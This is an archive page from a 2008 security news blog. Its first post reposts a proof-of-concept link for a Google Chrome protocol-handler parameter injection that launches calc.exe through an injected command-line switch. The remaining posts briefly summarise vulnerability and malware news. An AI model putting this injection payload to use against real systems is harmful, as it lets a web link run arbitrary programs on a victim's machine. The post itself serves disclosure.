Google Chrome Remote Parameter Injection

Tuesday, December 23rd, 2008

Google Chrome Browser (ChromeHTML://) remote parameter injection POC by Nine:Situations:Group::bellick&strawdog Site: http://retrogod.altervista.org/ tested against: Internet Explorer 8 beta 2, Google Chrome 1.0.154.36, Microsoft Windows XP SP3 List of command line switches: http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc Original url: http://retrogod.altervista.org/9sg_chrome.html click the following link with IE while monitoring with procmon --> <a href='chromehtml:www.google.com"%20--renderer-path="c:\windows\system32\calc.exe"%20--"'>click me</a> Source: http://www.milw0rm.com/exploits/7566

Posted in Coding, Internet, Security, Software | No Comments

Microsoft confirms critical SQL Server vulnerability

Monday, December 22nd, 2008

Microsoft late Monday issued a pre-patch advisory confirming a remote code execution vulnerability affecting its SQL Server line. The vulnerability, publicly disclosed with exploit code more than two weeks ago, affects Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine ...

Posted in Coding, Internet, Networking, Privacy, Security, Software, Windows | No Comments

Researchers sound alarm about bug in free antivirus scanner

Monday, December 22nd, 2008

A bug in Trend Micro's free online virus scanning service can be used by hackers to hijack Windows PCs running Internet Explorer, security researchers warned. Attackers able to dupe users into visiting a malicious Web page could exploit a vulnerability in the custom ActiveX control that Trend Micro distributes to users ...

Posted in Coding, Internet, Security | No Comments

DNSChanger 2.0

Sunday, December 21st, 2008

DNS Changer 2.0 (Trojan.Flush.M) is the next –in the wild- variant of this famous malware. Now the strategy has been changed, no need to modify the DNS settings on ADSL routers. Instead it will install a network driver (NDISProt.sys) which allows the malware to send/receive raw Ethernet packets. Such approach ...

Posted in Internet, Networking, Privacy, Security | No Comments

Lock Down Your Data

Saturday, December 20th, 2008

This is a great list of various things you can do to protect your data.  Here's a quick summary: 10. Wipe that iPhone (or BlackBerry) before trading in. 9. Use virtual credit cards for iffy online buys. 8. Hide data inside files with steganography. 7. Plan for the worst. 6. Get smarter on security questions. 5. ...

Posted in Internet, Privacy, Security | No Comments

Copyright 2008-2024 PC Sympathy - Entries (RSS) - Sitemap